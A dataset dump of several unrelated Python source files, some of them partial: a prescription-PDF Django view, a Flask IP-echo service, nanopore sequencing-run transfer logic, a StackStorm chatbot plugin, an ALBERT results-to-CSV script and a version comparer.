Paragraph(str(m_cerca_oi.altura), styles['center'])\n ],\n ]\n t = Table([headings] + mediciones)\n t.setStyle(TableStyle(\n [\n ('GRID', (0, 0), (6, 4), 1, brown),\n ('BACKGROUND', (0, 0), (-1, 0), None)\n ]\n ))\n content.append(t)\n if receta.lente_cerca:\n tbl_data = [\n [Paragraph(\"CERCA\", styles['dist'])],\n [\n Paragraph(\"MATERIAL CRISTAL\", styles['center']),\n Paragraph(\"MODELO\", styles['center']),\n Paragraph(\"COLOR\", styles['center'])],\n [\n Paragraph(receta.lente_cerca.cristalIzq.material_cristal.nombre, styles['center']),\n Paragraph(receta.lente_cerca.cristalIzq.modelo.nombre, styles['center']),\n Paragraph(receta.lente_cerca.cristalIzq.color.nombre, styles['center'])]\n ]\n tb = Table(tbl_data)\n content.append(tb)\n if receta.lente_cerca.cristalIzq.tratamientos.count()>0:\n tratamientos = [[Paragraph(\"TRATAMIENTOS CRISTAL\", styles['center'])]]\n for t in receta.lente_cerca.cristalIzq.tratamientos.all():\n tratamientos.append([Paragraph(t.nombre, styles['center'])])\n tb = Table(tratamientos)\n content.append(tb)\n content.append(Paragraph('Armazón: '+receta.lente_cerca.nombre+\" \"+str(receta.lente_cerca.codigo), styles['default']))\n content.append(Paragraph('Obs: ' + receta.lente_cerca.descripcion, styles['default']))\n if receta.lente_lejos:\n tbl_data = [\n [Paragraph(\"LEJOS\", styles['dist'])],\n [\n Paragraph(\"MATERIAL CRISTAL\", styles['center']),\n Paragraph(\"MODELO\", styles['center']),\n Paragraph(\"COLOR\", styles['center'])],\n [\n Paragraph(receta.lente_lejos.cristalIzq.material_cristal.nombre, styles['center']),\n Paragraph(receta.lente_lejos.cristalIzq.modelo.nombre, styles['center']),\n 
Paragraph(receta.lente_lejos.cristalIzq.color.nombre, styles['center'])]\n ]\n tb = Table(tbl_data)\n content.append(tb)\n if receta.lente_lejos.cristalIzq.tratamientos.count()>0:\n tratamientos = [[Paragraph(\"TRATAMIENTOS CRISTAL\", styles['center'])]]\n for t in receta.lente_lejos.cristalIzq.tratamientos.all():\n tratamientos.append([Paragraph(t.nombre, styles['center'])])\n tb = Table(tratamientos)\n content.append(tb)\n content.append(Paragraph('Armazón: ' + receta.lente_lejos.nombre + \" \" + str(receta.lente_lejos.codigo),\n styles['default']))\n content.append(Paragraph('Obs: ' + receta.lente_lejos.descripcion, styles['default']))\n content.append(Paragraph('Dr.: ' + receta.doctor.usuario.first_name+\" \"+ receta.doctor.usuario.last_name, styles['center']))\n doc.build(content)\n response.write(buffer.getvalue())\n buffer.close()\n return response\n\ndef stylesheet():\n styles = {\n 'default': ParagraphStyle(\n 'default',\n fontName='Times-Roman',\n fontSize=12,\n leading=18,\n leftIndent=0,\n rightIndent=0,\n firstLineIndent=0,\n alignment=TA_LEFT,\n spaceBefore=0,\n spaceAfter=0,\n bulletFontName='Times-Roman',\n bulletFontSize=10,\n bulletIndent=0,\n textColor=brown,\n backColor=None,\n wordWrap=None,\n borderWidth=0,\n borderPadding=0,\n borderColor=None,\n borderRadius=None,\n allowWidows=1,\n allowOrphans=0,\n textTransform=None, # 'uppercase' | 'lowercase' | None\n endDots=None,\n splitLongWords=1,\n ),\n }\n styles['title'] = ParagraphStyle(\n 'title',\n parent=styles['default'],\n fontName='Helvetica-Bold',\n fontSize=14,\n leading=18,\n alignment=TA_CENTER,\n textColor=brown,\n textTransform='uppercase',\n )\n styles['center'] = ParagraphStyle(name='center', parent=styles['default'], textColor=brown, alignment=TA_CENTER)\n styles['rigth'] = ParagraphStyle(name='right', parent=styles['default'], textColor=brown, alignment=TA_RIGHT)\n styles['dist'] = ParagraphStyle(name='dist', fontName='Helvetica-Bold', parent=styles['default'], textColor=white,\n backColor=brown, alignment=TA_CENTER)\n return styles\n","sub_path":"receta/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":11151,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"104856146","text":"from flask import Flask, render_template, request, jsonify\nimport socket \n\napp = Flask(__name__)\n\n@app.route(\"/\", methods=[\"GET\"])\ndef get_my_ip():\n\n if request.environ.get('HTTP_CF_CONNECTING_IPV6'):\n real_ip = request.environ.get('HTTP_CF_CONNECTING_IPV6')\n else:\n real_ip = request.environ['HTTP_X_FORWARDED_FOR'].split(',')[0]\n\n try:\n ip_hostname = socket.gethostbyaddr(real_ip)[0]\n except:\n ip_hostname = \"No reverse DNS for IP\"\n return render_template(\n 'ip_new.html', ip=real_ip, hostname=ip_hostname\n )\n\n@app.route(\"/api\", methods=[\"GET\"])\ndef get_my_ip_api():\n return_data = {}\n \n if request.environ.get('HTTP_CF_CONNECTING_IPV6'):\n real_ip = request.environ.get('HTTP_CF_CONNECTING_IPV6')\n else:\n real_ip = request.environ['HTTP_X_FORWARDED_FOR'].split(',')[0]\n\n try:\n ip_hostname = socket.gethostbyaddr(real_ip)[0]\n except:\n ip_hostname = \"no_rdns_for_ip\"\n\n return_data['ip'] = real_ip\n return_data['hostname'] = ip_hostname\n \n try:\n if request.environ['HTTP_DNT']:\n return_data['do_not_track'] = 'true'\n else:\n return_data['do_not_track'] = 'false'\n except:\n return_data['do_not_track'] = 'unknown'\n try:\n return_data['user_agent'] = request.environ['HTTP_USER_AGENT']\n except:\n return_data['user_agent'] = 
\"unknown\"\n\n return jsonify(return_data),200\n\nif __name__ == '__main__':\n app.run()\n","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1491,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"349710951","text":"\"\"\"Nanopore analysis methods for TACA.\"\"\"\nimport os\nimport logging\nimport subprocess\n\nfrom dateutil.parser import parse\nfrom taca.utils.config import CONFIG\nfrom taca.utils.misc import send_mail\nfrom taca.nanopore.minion import MinIONdelivery, MinIONqc\nfrom taca.nanopore.ont_transfer import PromethionTransfer, MinionTransfer\n\nlogger = logging.getLogger(__name__)\n\n\ndef is_date(string):\n \"\"\"\n Return whether the string can be interpreted as a date.\n\n :param string: str, string to check for date\n From https://stackoverflow.com/questions/25341945/check-if-string-has-date-any-format\n \"\"\"\n try:\n parse(string, fuzzy=False)\n return True\n except ValueError:\n return False\n\n\ndef find_minion_runs(minion_data_dir, skip_dirs):\n \"\"\"Find nanopore runs to process.\"\"\"\n found_run_dirs = []\n try:\n found_top_dirs = [\n os.path.join(minion_data_dir, top_dir)\n for top_dir in os.listdir(minion_data_dir)\n if os.path.isdir(os.path.join(minion_data_dir, top_dir))\n and top_dir not in skip_dirs\n ]\n except OSError:\n logger.warning(\n \"There was an issue locating the following directory: {}. \"\n \"Please check that it exists and try again.\".format(minion_data_dir)\n )\n # Get the actual location of the run directories in /var/lib/MinKnow/data/QC_runs/USERDETERMINEDNAME/USERDETSAMPLENAME/run\n if found_top_dirs:\n for top_dir in found_top_dirs:\n if os.path.isdir(top_dir):\n for sample_dir in os.listdir(top_dir):\n if os.path.isdir(os.path.join(top_dir, sample_dir)):\n for run_dir in os.listdir(os.path.join(top_dir, sample_dir)):\n found_run_dirs.append(\n os.path.join(top_dir, sample_dir, run_dir)\n )\n else:\n logger.warning(\n \"Could not find any run directories in {}\".format(minion_data_dir)\n )\n return found_run_dirs\n\n\ndef find_ont_transfer_runs(ont_data_dir, skip_dirs):\n \"\"\"Find runs in ngi-nas.\n These are assumed to be flowcell dirs, not project dirs.\n \"\"\"\n try:\n found_dirs = [\n os.path.join(ont_data_dir, top_dir)\n for top_dir in os.listdir(ont_data_dir)\n if os.path.isdir(os.path.join(ont_data_dir, top_dir))\n and top_dir not in skip_dirs\n ]\n except OSError:\n logger.warning(\n \"There was an issue locating the following directory: {}. \"\n \"Please check that it exists and try again.\".format(ont_data_dir)\n )\n return found_dirs\n\n\ndef process_minion_qc_run(minion_run):\n \"\"\"Process MinION QC runs on Squiggle.\n \"\"\"\n logger.info(\"Processing QC run: {}\".format(minion_run.run_dir))\n email_recipients = CONFIG.get(\"mail\").get(\"recipients\")\n if not len(minion_run.summary_file):\n logger.info(\n \"Sequencing is still ongoing for run {}. Skipping.\".format(\n minion_run.run_id\n )\n )\n return\n \n if (\n len(minion_run.summary_file)\n and os.path.isfile(minion_run.summary_file[0])\n and not os.path.isdir(minion_run.anglerfish_dir)\n ):\n logger.info(\n \"Sequencing is done for run {}. 
Attempting to start Anglerfish.\".format(\n minion_run.run_id\n )\n )\n if not minion_run.anglerfish_sample_sheet:\n minion_run.anglerfish_sample_sheet = minion_run.get_anglerfish_samplesheet()\n \n if minion_run.anglerfish_sample_sheet and os.path.isfile(minion_run.anglerfish_sample_sheet):\n minion_run.start_anglerfish()\n else:\n logger.warning(\n \"Anglerfish sample sheet missing for run {}. \"\n \"Please provide one using --anglerfish_sample_sheet \"\n \"or complete the correct lims step.\".format(minion_run.run_id)\n )\n elif not os.path.isfile(minion_run.anglerfish_exit_status_file):\n logger.info(\n \"Anglerfish has started for run {} but is not yet done. Skipping.\".format(\n minion_run.run_id\n )\n )\n elif os.path.isfile(minion_run.anglerfish_exit_status_file):\n anglerfish_successful = minion_run.check_exit_status(\n minion_run.anglerfish_exit_status_file\n )\n if anglerfish_successful:\n if minion_run.copy_results_for_lims():\n logger.info(\n \"Anglerfish finished OK for run {}. Notifying operator.\".format(\n minion_run.run_id\n )\n )\n email_subject = (\n \"Anglerfish successfully processed run {}\".format(\n minion_run.run_id\n )\n )\n email_message = (\n \"Anglerfish has successfully finished for run {}. Please \"\n \"finish the QC step in lims.\"\n ).format(minion_run.run_id)\n send_mail(email_subject, email_message, email_recipients)\n else:\n email_subject = \"Run processed with errors: {}\".format(\n minion_run.run_id\n )\n email_message = (\n \"Anglerfish has successfully finished for run {} but an error \"\n \"occurred while transferring the results to lims.\"\n ).format(minion_run.run_id)\n send_mail(email_subject, email_message, email_recipients)\n\n if minion_run.is_not_transferred():\n if minion_run.transfer_run():\n if minion_run.update_transfer_log():\n logger.info(\n \"Run {} has been synced to the analysis cluster.\".format(\n minion_run.run_id\n )\n )\n else:\n email_subject = \"Run processed with errors: {}\".format(\n minion_run.run_id\n )\n email_message = (\n \"Run {} has been transferred, but an error occurred while updating \"\n \"the transfer log\"\n ).format(minion_run.run_id)\n send_mail(\n email_subject, email_message, email_recipients\n )\n\n if minion_run.archive_run():\n logger.info(\n \"Run {} is finished and has been archived. Notifying operator.\".format(\n minion_run.run_id\n )\n )\n email_subject = \"Run successfully processed: {}\".format(\n minion_run.run_id\n )\n email_message = (\n \"Run {} has been analysed, transferred and archived \"\n \"successfully.\"\n ).format(minion_run.run_id)\n send_mail(\n email_subject, email_message, email_recipients\n )\n else:\n email_subject = \"Run processed with errors: {}\".format(\n minion_run.run_id\n )\n email_message = (\n \"Run {} has been analysed, but an error occurred during \"\n \"archiving\"\n ).format(minion_run.run_id)\n send_mail(\n email_subject, email_message, email_recipients\n )\n else:\n logger.warning(\n \"An error occurred during transfer of run {} \"\n \"to the analysis cluster. 
Notifying operator.\".format(\n minion_run.run_id\n )\n )\n email_subject = \"Run processed with errors: {}\".format(\n minion_run.run_id\n )\n email_message = (\n \"Run {} has been analysed, but an error occurred during \"\n \"transfer to the analysis cluster.\"\n ).format(minion_run.run_id)\n send_mail(email_subject, email_message, email_recipients)\n else:\n logger.warning(\n \"The following run has already been transferred, \"\n \"skipping: {}\".format(minion_run.run_id)\n )\n\n else:\n logger.warning(\n \"Anglerfish exited with a non-zero exit status for run {}. \"\n \"Notifying operator.\".format(minion_run.run_id)\n )\n email_subject = \"Run processed with errors: {}\".format(\n minion_run.run_id\n )\n email_message = (\n \"Anglerfish exited with errors for run {}. Please \"\n \"check the log files and restart.\"\n ).format(minion_run.run_id)\n send_mail(email_subject, email_message, email_recipients)\n\n return\n\n\ndef process_minion_delivery_run(minion_run):\n \"\"\"Process minion delivery runs on Squiggle.\"\"\"\n email_recipients = CONFIG.get(\"mail\").get(\"recipients\")\n logger.info(\"Processing run {}\".format(minion_run.run_id))\n minion_run.dump_path()\n if not len(minion_run.summary_file): # Run not finished, only rsync\n minion_run.transfer_run()\n else: # Run finished, rsync and archive\n if minion_run.transfer_run():\n finished_indicator = minion_run.write_finished_indicator()\n destination = os.path.join(\n minion_run.transfer_details.get(\"destination\"), minion_run.run_id\n )\n sync_finished_indicator = [\"rsync\", finished_indicator, destination]\n process_handle = subprocess.run(sync_finished_indicator)\n minion_run.archive_run()\n logger.info(\"Run {} has been fully transferred.\".format(minion_run.run_id))\n email_subject = \"Run successfully processed: {}\".format(minion_run.run_id)\n email_message = (\n \"Run {} has been transferred and archived \" \"successfully.\"\n ).format(minion_run.run_id)\n send_mail(email_subject, email_message, email_recipients)\n else:\n logger.warning(\n \"An error occurred during transfer of run {}.\".format(minion_run.run_id)\n )\n email_subject = \"Run processed with errors: {}\".format(minion_run.run_id)\n email_message = (\n \"An error occurred during the \" \"transfer of run {}.\"\n ).format(minion_run.run_id)\n send_mail(email_subject, email_message, email_recipients)\n\n\ndef transfer_ont_run(ont_run):\n \"\"\"Transfer ONT runs to HPC cluster.\"\"\"\n email_recipients = CONFIG.get(\"mail\").get(\"recipients\")\n logger.info(\"Processing run {}\".format(ont_run.run_id))\n\n # Update StatusDB\n try:\n ont_run.update_db()\n except Exception as e:\n logger.warning(f\"Database update for run {ont_run.run_id} failed\")\n email_subject = \"Run processed with errors: {}\".format(ont_run.run_id)\n email_message = (\n f\"An error occured when updating statusdb with run {ont_run.run_id}.\\n{e}\"\n )\n send_mail(email_subject, email_message, email_recipients)\n\n if os.path.isfile(ont_run.sync_finished_indicator):\n logger.info(\n \"Sequencing done for run {}. 
Attempting to start processing.\".format(\n ont_run.run_id\n )\n )\n if ont_run.is_not_transferred():\n\n # Copy metadata\n try:\n ont_run.transfer_metadata()\n logger.info(\n f\"Metadata of run {ont_run.run_id} has been synced to {ont_run.metadata_dir}\"\n )\n except BaseException as e:\n email_subject = f\"Run processed with errors: {ont_run.run_id}\"\n email_message = f\"Run {ont_run.run_id} has been analysed, but an error occurred when copying the metadata: \\n{str(e)}\"\n send_mail(email_subject, email_message, email_recipients)\n\n # Transfer run\n if ont_run.transfer_run():\n if ont_run.update_transfer_log():\n logger.info(\n \"Run {} has been synced to the analysis cluster.\".format(\n ont_run.run_id\n )\n )\n else:\n email_subject = \"Run processed with errors: {}\".format(\n ont_run.run_id\n )\n email_message = (\n \"Run {} has been transferred, but an error occurred while updating \"\n \"the transfer log\"\n ).format(ont_run.run_id)\n send_mail(email_subject, email_message, email_recipients)\n\n if ont_run.archive_run():\n logger.info(\n \"Run {} is finished and has been archived. \"\n \"Notifying operator.\".format(ont_run.run_id)\n )\n email_subject = \"Run successfully processed: {}\".format(\n ont_run.run_id\n )\n email_message = (\n \"Run {} has been transferred and archived \" \"successfully.\"\n ).format(ont_run.run_id)\n send_mail(email_subject, email_message, email_recipients)\n else:\n email_subject = \"Run processed with errors: {}\".format(\n ont_run.run_id\n )\n email_message = (\n \"Run {} has been analysed, but an error occurred during \"\n \"archiving\"\n ).format(ont_run.run_id)\n send_mail(email_subject, email_message, email_recipients)\n\n else:\n email_subject = \"Run processed with errors: {}\".format(ont_run.run_id)\n email_message = (\n \"An error occurred during transfer of run {} \"\n \"to the analysis cluster.\"\n ).format(ont_run.run_id)\n send_mail(email_subject, email_message, email_recipients)\n\n else:\n logger.warning(\n \"The following run has already been transferred, \"\n \"skipping: {}\".format(ont_run.run_id)\n )\n else:\n logger.info(\n \"Run {} not finished sequencing yet. Skipping.\".format(ont_run.run_id)\n )\n\n\ndef process_minion_qc_runs(run, anglerfish_sample_sheet):\n \"\"\"Find and process MinION QC runs on Squiggle.\"\"\"\n if run:\n if is_date(os.path.basename(run).split(\"_\")[0]):\n minion_run = MinIONqc(\n os.path.abspath(run), anglerfish_sample_sheet\n )\n process_minion_qc_run(minion_run)\n else:\n logger.warning(\n \"The specified path is not a flow cell. Please \"\n \"provide the full path to the flow cell you wish to process.\"\n )\n else:\n nanopore_data_dir = (\n CONFIG.get(\"nanopore_analysis\").get(\"minion_qc_run\").get(\"data_dir\")\n )\n skip_dirs = (\n CONFIG.get(\"nanopore_analysis\").get(\"minion_qc_run\").get(\"ignore_dirs\")\n )\n runs_to_process = find_minion_runs(nanopore_data_dir, skip_dirs)\n for run_dir in runs_to_process:\n minion_run = MinIONqc(\n run_dir, anglerfish_sample_sheet\n )\n process_minion_qc_run(minion_run)\n\n\ndef process_minion_delivery_runs(run):\n \"\"\"Find MinION delivery runs on Squiggle and transfer them to ngi-nas.\"\"\"\n if run:\n if is_date(os.path.basename(run).split(\"_\")[0]):\n minion_run = MinIONdelivery(os.path.abspath(run))\n process_minion_delivery_run(minion_run)\n else:\n logger.warning(\n \"The specified path is not a flow cell. 
Please \"\n \"provide the full path to the flow cell you wish to process.\"\n )\n else:\n minion_data_dir = (\n CONFIG.get(\"nanopore_analysis\").get(\"minion_delivery_run\").get(\"data_dir\")\n )\n skip_dirs = (\n CONFIG.get(\"nanopore_analysis\")\n .get(\"minion_delivery_run\")\n .get(\"ignore_dirs\")\n )\n runs_to_process = find_minion_runs(minion_data_dir, skip_dirs)\n for run_dir in runs_to_process:\n minion_run = MinIONdelivery(run_dir)\n process_minion_delivery_run(minion_run)\n\n\ndef transfer_finished(run):\n \"\"\"Find finished ONT runs in ngi-nas and transfer to HPC cluster.\"\"\"\n if run:\n if is_date(os.path.basename(run).split(\"_\")[0]):\n if \"minion\" in run:\n ont_run = MinionTransfer(os.path.abspath(run))\n elif \"promethion\" in run:\n ont_run = PromethionTransfer(os.path.abspath(run))\n transfer_ont_run(ont_run)\n else:\n logger.warning(\n \"The specified path is not a flow cell. Please \"\n \"provide the full path to the flow cell you wish to process.\"\n )\n else:\n # Locate all runs in /srv/ngi_data/sequencing/promethion and /srv/ngi_data/sequencing/minion\n ont_data_dirs = (\n CONFIG.get(\"nanopore_analysis\").get(\"ont_transfer\").get(\"data_dirs\")\n )\n skip_dirs = (\n CONFIG.get(\"nanopore_analysis\").get(\"ont_transfer\").get(\"ignore_dirs\")\n )\n for data_dir in ont_data_dirs:\n runs_to_process = find_ont_transfer_runs(data_dir, skip_dirs)\n for run_dir in runs_to_process:\n if \"minion\" in data_dir:\n ont_run = MinionTransfer(run_dir)\n transfer_ont_run(ont_run)\n elif \"promethion\" in data_dir:\n ont_run = PromethionTransfer(run_dir)\n transfer_ont_run(ont_run)\n\n\ndef ont_updatedb_from_cli(run):\n\n if is_date(os.path.basename(run).split(\"_\")[0]):\n if \"minion\" in run:\n ont_run = MinionTransfer(os.path.abspath(run))\n elif \"promethion\" in run:\n ont_run = PromethionTransfer(os.path.abspath(run))\n ont_run.update_db(force_update=True)\n else:\n logger.warning(\n \"The specified path is not a flow cell. 
Please \"\n \"provide the full path to the flow cell you wish to process.\"\n )\n","sub_path":"taca/analysis/analysis_nanopore.py","file_name":"analysis_nanopore.py","file_ext":"py","file_size_in_byte":19032,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"624986139","text":"# coding:utf-8\nimport six\nimport json\nimport time\nimport pprint\nimport logging\nimport requests\nimport sseclient\nimport subprocess\n\nfrom st2pluginauth import St2PluginAuth\nfrom st2client.client import Client\nfrom st2pluginactionaliasparser import St2PluginActionAliasParser\nfrom st2client.models.action_alias import ActionAliasMatch\nfrom st2client.models.aliasexecution import ActionAliasExecution\nfrom requests.exceptions import HTTPError\nLOG = logging.getLogger(__name__)\n\n\nclass St2PluginAPI(object):\n def __init__(self, st2config):\n self.st2config = st2config\n self.st2auth = St2PluginAuth(st2config)\n self.parser = St2PluginActionAliasParser(st2config.full_prefix)\n\n def show_help(self):\n \"\"\"\n Pass-through to action alias parser.\n \"\"\"\n # curl -v -H \"X-Auth-Token: $ST2_AUTH_TOKEN\"\n # -H 'Content-Type: application/json'\n # -XPOST localhost:9101/v1/actionalias/help -d '{}'\n return self.parser.show_help()\n\n def match(self, text):\n auth_kwargs = self.st2auth.auth_method(\"st2client\")\n auth_kwargs['debug'] = False\n\n LOG.info(\"Create st2 client with {} {} {}\".format(self.st2config.base_url,\n self.st2config.api_url,\n auth_kwargs))\n\n st2_client = Client(base_url=self.st2config.base_url,\n api_url=self.st2config.api_url,\n **auth_kwargs)\n\n alias_match = ActionAliasMatch()\n alias_match.command = text\n\n try:\n return st2_client.managers['ActionAlias'].match(alias_match)\n except HTTPError as e:\n if e.response is not None and e.response.status_code == 400:\n print(\"No match found\")\n else:\n print(\"HTTPError %s\" % e)\n return None\n\n def run_action(self, action, **kwargs):\n \"\"\"\n Perform the system call to execute the Stackstorm action.\n \"\"\"\n opt, auth = self.st2auth.auth_method(\"st2\").popitem()\n cmd = ['/opt/stackstorm/st2/bin/st2',\n '--url={}'.format(self.st2config.base_url),\n '--auth-url={}'.format(self.st2config.auth_url),\n '--api-url={}'.format(self.st2config.api_url),\n '--api-version={}'.format(self.st2config.api_version),\n 'run',\n '-j',\n '{}'.format(opt),\n '{}'.format(auth),\n '{}'.format(action)]\n for k, v in six.iteritems(kwargs):\n cmd.append('{}={}'.format(k, v))\n\n sp = subprocess.Popen(cmd, shell=False, stdout=subprocess.PIPE,\n stderr=subprocess.STDOUT,\n cwd='/opt/stackstorm/st2/bin')\n output = sp.communicate()[0].strip().decode('utf-8')\n returncode = sp.returncode\n LOG.info(output)\n return output\n\n def action_execution(self, msg, action_ref, action_alias, **kwargs):\n \"\"\"\n Execute actions via api\n @action - Action reference.\n @msg - Errbot's chat message.\n @kwargs - a dict containing 0 or more arguments to be provided when calling the action.\n \"\"\"\n\n LOG.info(\"\\u001b[35m Action={} kwargs={} \\u001b[0m\".format(action_alias.name, kwargs))\n\n # run packs.info pack=livestatus\n # Step 1. 
Fetch action metadata\n # http://127.0.0.1:9101/v1/actions/packs.info\n\n auth_kwargs = self.st2auth.auth_method(\"st2client\")\n LOG.info(\"Create st2 client with {} {} {}\".format(self.st2config.base_url,\n self.st2config.api_url,\n auth_kwargs))\n\n st2_client = Client(base_url=self.st2config.base_url,\n api_url=self.st2config.api_url,\n **auth_kwargs)\n\n LOG.info(\"\\u001b[35m {} {}\\u001b[0m\".format(action_ref, kwargs))\n action_meta = st2_client.actions.get_by_id(action_ref)\n if not action_meta.enabled:\n return \"{}.{} won't execute because it's disabled.\".format(action_meta.pack,\n action_meta.name)\n LOG.info(\"\\u001b[35m action_meta={}\\u001b[0m\".format(action_meta))\n\n # Step 2. Extract runner-type (and validate parameters)\n # \"runner_type\" : \"python-script\",\n # action_meta=\n runnertype_meta = st2_client.runners.get_by_name(action_meta.runner_type)\n LOG.info(\"\\u001b[35m runnertype_meta={}\\u001b[0m\".format(runnertype_meta))\n\n # Step 3. Fetch runner-type metadata\n # http://127.0.0.1:9101/v1/runnertypes/?name=python-script\n #\n # Step 4. Not sure what to do with runner-type metadata\n #\n # Step 5. Call execute API with JSON payload containing parameters\n # '{\"action\": \"packs.info\", \"user\": null, \"parameters\":\n # {\"pack\": \"livestatus\"}}' http://127.0.0.1:9101/v1/executions\n LOG.info([action_meta.pack, action_meta.name, msg.body, msg.frm, msg.channelname])\n\n url = self.st2config.api_url+\"executions\"\n payload = {\n 'action': \"{}.{}\".format(action_meta.pack, action_meta.name),\n 'format': \"xxxx\",\n 'command': msg.body,\n 'user': str(msg.frm),\n 'parameters': {\"pack\": action_meta.pack},\n 'source_channel': msg.channelname,\n 'notification_route': 'errbot'\n }\n\n payload = \"{} {} {}\".format(str(dir(action_meta)),\n str(dir(msg)),\n str(dir(runnertype_meta)))\n\n LOG.info(\"\\u001b[35m PAYLOAD={}\\u001b[0m\".format(payload))\n r = requests.post(url, json=payload, verify=False)\n LOG.info(r)\n # Step 6. 
Get the state of the execution http://127.0.0.1:9101/v1/executions/\n return {\n \"url\": url,\n \"payload\": str(payload),\n \"runnertype_meta\": str(runnertype_meta),\n \"action_meta\": str(action_meta),\n \"ebbot_msg\": str(msg)\n }\n raise NotImplementedError\n\n def execute_actionalias(self, action_alias, representation, msg):\n \"\"\"\n @action_alias: the st2client action_alias object.\n @representation: the st2client representation for the action_alias.\n @msg: errbot message.\n \"\"\"\n auth_kwargs = self.st2auth.auth_method(\"st2client\")\n LOG.info(\"Create st2 client with {} {} {}\".format(self.st2config.base_url,\n self.st2config.api_url,\n auth_kwargs))\n\n st2_client = Client(base_url=self.st2config.base_url,\n api_url=self.st2config.api_url,\n debug=True,\n **auth_kwargs)\n\n execution = ActionAliasExecution()\n execution.name = action_alias.name\n execution.format = representation\n execution.command = msg.body\n if msg.is_direct == False:\n execution.notification_channel = str(msg.to)\n execution.source_channel = str(msg.to)\n else:\n execution.notification_channel = str(msg.frm)\n execution.source_channel = str(msg.frm)\n\n execution.notification_route = 'errbot'\n execution.user = str(msg.frm)\n\n LOG.info(\"Execution: {}\".format([execution.command,\n execution.format,\n execution.name,\n execution.notification_channel,\n execution.notification_route,\n execution.source_channel,\n execution.user]))\n\n action_exec_mgr = st2_client.managers['ActionAliasExecution']\n execution = action_exec_mgr.create(execution)\n\n LOG.info(\"AFTER {}{}\".format(type(execution), dir(execution)))\n try:\n ret_msg = execution.message\n LOG.info(\"AFTER {}{}\".format(execution.execution, execution.message))\n except AttributeError as e:\n ret_msg = \"Something is happening ... 
\"\n return ret_msg # \" \".join([execution.message])\n\n def st2stream_listener(self, callback=None):\n \"\"\"\n Listen for events passing through the stackstorm bus\n \"\"\"\n LOG.info(\"\\u001b[35m Starting stream listener \\u001b[0m\")\n\n def listener(callback=None):\n headers = self.st2auth.auth_method(\"requests\")\n headers.update({'Accept': 'text/event-stream'})\n\n response = requests.get(self.st2config.stream_url, headers=headers, stream=True)\n\n client = sseclient.SSEClient(response)\n for event in client.events():\n data = json.loads(event.data)\n if event.event in [\"st2.announcement__errbot\"]:\n LOG.info(\"\\u001b[35mErrbot announcement event detected!\\u001b[0m\")\n channel = data[\"payload\"].get('channel')\n message = data[\"payload\"].get('message')\n\n user = data[\"payload\"].get('user')\n whisper = data[\"payload\"].get('whisper')\n extra = data[\"payload\"].get('extra')\n\n callback(whisper, message, user, channel, extra)\n\n while True:\n try:\n listener(callback)\n except Exception as e:\n LOG.critical(\"St2 stream listener - An error occurred: %s\" % e)\n time.sleep(60)\n\n def generate_actionaliases(self):\n \"\"\"\n A wrapper method to check for API access authorisation.\n \"\"\"\n try:\n if not self.st2auth.valid_credentials():\n self.st2auth.renew_token()\n except requests.exceptions.HTTPError as e:\n LOG.info(\"Error while validating credentials %s (%s)\" % (e.reason, e.code))\n\n try:\n self._generate_actionaliases()\n except Exception as e:\n LOG.error(\"Error while fetching action aliases %s\" % e)\n\n def _generate_actionaliases(self):\n \"\"\"\n generate pattern and help for action alias\n \"\"\"\n self.help = ''\n self.pattern_action = {}\n\n base_url = self.st2config.base_url\n api_url = self.st2config.api_url\n\n auth_kwargs = self.st2auth.auth_method(\"st2client\")\n LOG.info(\"\\u001b[35m Create st2 client with {} {} {} \\u001b[0m\".format(base_url,\n api_url,\n auth_kwargs))\n st2_client = Client(base_url=base_url, api_url=api_url, **auth_kwargs)\n self.parser.process_actionaliases(st2_client.managers['ActionAlias'].get_all())\n","sub_path":"st2pluginapi.py","file_name":"st2pluginapi.py","file_ext":"py","file_size_in_byte":11233,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"54926598","text":"import csv\nimport pandas as pd\nimport sys\nimport numpy as np\n\npredict_result_dir = \"./2019ncov_albert_base_zh_google/test_results.tsv\"\ntest_data_dir = \"./chineseGLUEdatasets/2019ncov/processed_test.txt\"\ncsv_result_dir = \"./2019ncov_albert_base_zh_google/test_result_albert.csv\"\n\npredict_result = pd.read_csv(predict_result_dir, header=None)\n\n# 第0个位置对应标签“-1”,第1个位置对应标签“0”,第2个位置对应标签“1”,\nposition_label_map = {0: -1, 1: 0, 2: 1}\nlabel_list = []\nfor i in range(len(predict_result)):\n possible_list = list(predict_result.loc[i])[0].split(\"\\t\")\n label = position_label_map[np.argmax(possible_list)]\n label_list.append(label)\n\nwbid_list = []\nwith open(test_data_dir, \"r\",encoding=\"utf-8\") as f:\n for line in f.readlines():\n wbid = line.split(\"__\")[0]\n wbid_list.append(wbid)\n\nwith open(csv_result_dir, \"w\", encoding=\"utf-8\", newline=\"\") as csv_file:\n writer = csv.writer(csv_file)\n writer.writerow([\"id\", \"y\"])\n for i in range(len(wbid_list)):\n writer.writerow([wbid_list[i], 
label_list[i]])\n\n","sub_path":"albert_google/write_result_to_csv.py","file_name":"write_result_to_csv.py","file_ext":"py","file_size_in_byte":1088,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"60524520","text":"def compare_versions(v1, v2):\n    \"\"\"\n    Return the later of two dotted version strings, or -1 if they are equal.\n    \"\"\"\n    arr1 = v1.split(\".\")\n    arr2 = v2.split(\".\")\n    i = 0\n    res = -1\n    # Treat missing components as 0 so versions of unequal length compare safely\n    while i < len(arr1) or i < len(arr2):\n        p1 = int(arr1[i]) if i < len(arr1) else 0\n        p2 = int(arr2[i]) if i < len(arr2) else 0\n        if p1 > p2:\n            return v1\n        elif p2 > p1:\n            return v2\n        i += 1\n    return res\n\n\nif __name__ == \"__main__\":\n    m = input()\n    n = input()\n    print(compare_versions(m, n))\n","sub_path":"src/main/java/version_compare.py","file_name":"version_compare.py","file_ext":"py","file_size_in_byte":444,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"321325590","text":"'''\r\nRealiza un programa que pida al usuario un número entero del 0 al 9, y que mientras el número no sea correcto se repita el proceso. \r\nLuego debe comprobar si el número se encuentra en la lista de números y notificarlo. \r\nSugerencia: La sintaxis valor in lista permite comprobar 